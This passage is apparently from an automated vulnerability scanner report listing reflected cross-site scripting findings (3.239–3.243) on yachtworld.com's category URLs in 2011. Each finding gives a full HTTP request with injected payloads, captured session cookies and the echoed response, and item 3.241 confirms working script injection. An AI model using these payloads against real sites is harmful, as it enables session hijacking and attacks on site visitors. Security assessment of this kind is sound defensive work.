Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:05 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type/Grady+White/1304f2"><a>dbf459730e4/1">
...[SNIP]...

3.239. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grand+Banks/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f4b"><a>675c8c37f1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type90f4b"><a>675c8c37f1f/Grand+Banks/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type90f4b"><a>675c8c37f1f/Grand+Banks/1">
...[SNIP]...

3.240. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grand+Banks/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23e"><a>c27d5cc2ef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Grand+Banksde23e"><a>c27d5cc2ef/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:49 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Grand+Banksde23e"><a>c27d5cc2ef/A-1">
...[SNIP]...

3.241. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Grand+Banks/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f682"><script>alert(1)</script>05b90dea404 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Grand+Banks/18f682"><script>alert(1)</script>05b90dea404 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:58 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Grand+Banks/18f682"><script>alert(1)</script>05b90dea404/A-1">
...[SNIP]...

3.242. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hatteras/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2b3b"><a>28b0af17e62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typeb2b3b"><a>28b0af17e62/Hatteras/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:26 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typeb2b3b"><a>28b0af17e62/Hatteras/1">
...[SNIP]...

3.243. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hatteras/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c182e"><a>21c7eb04f64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Hatterasc182e"><a>21c7eb04f64/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
